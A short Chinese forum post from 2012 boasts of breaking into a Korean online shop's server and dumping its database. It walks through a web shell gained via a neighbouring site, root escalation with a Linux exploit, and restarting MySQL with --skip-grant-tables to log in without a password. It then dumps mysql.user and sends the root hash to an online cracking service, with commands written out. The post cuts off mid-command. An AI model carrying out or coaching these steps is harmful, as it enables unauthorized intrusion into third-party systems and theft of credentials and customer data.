韩国某shop脱裤过程

[复制链接]
查看1287 | 回复0 | 2012-4-1 19:28:33 | 显示全部楼层 |阅读模式
  看上了韩国某shop的数据库,旁注得到了shell

  但是无法跨站,真蛋疼。用linux的EXP提权。

  小菜只会用EXP。。。

  一路cd到目标网站路径,发现文件多的要死,哪有闲心找他的mysql帐密!时间就是生命

  早干完早收工睡觉。

  都有root权限了,还不好说。。

  首先,root下关掉mysqldaemon

  /etc/init.d/mysqldstop

  然后跳过授权表

  mysqld_safe--skip-grant-tables--skip-networking

  (注:参数--skip-grant-tables为跳过授权表;--skip-networking为不监听TCP/IP连接,加上这个参数主要是防止别人连接进来,也可以不加。)

  然后就是无密码登陆mysql了~

  mysql-uroot

  登陆成功了,查看mysql的root哈希

  select*frommysql.user;

  复制mysql的root哈希,丢到cmd5,破解中。。。

  也不好直接更改mysql的root密码,怕管理员跨国来找我麻烦。

  safe模式下的权限已经够用的了

  showdatabases;

  use
发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则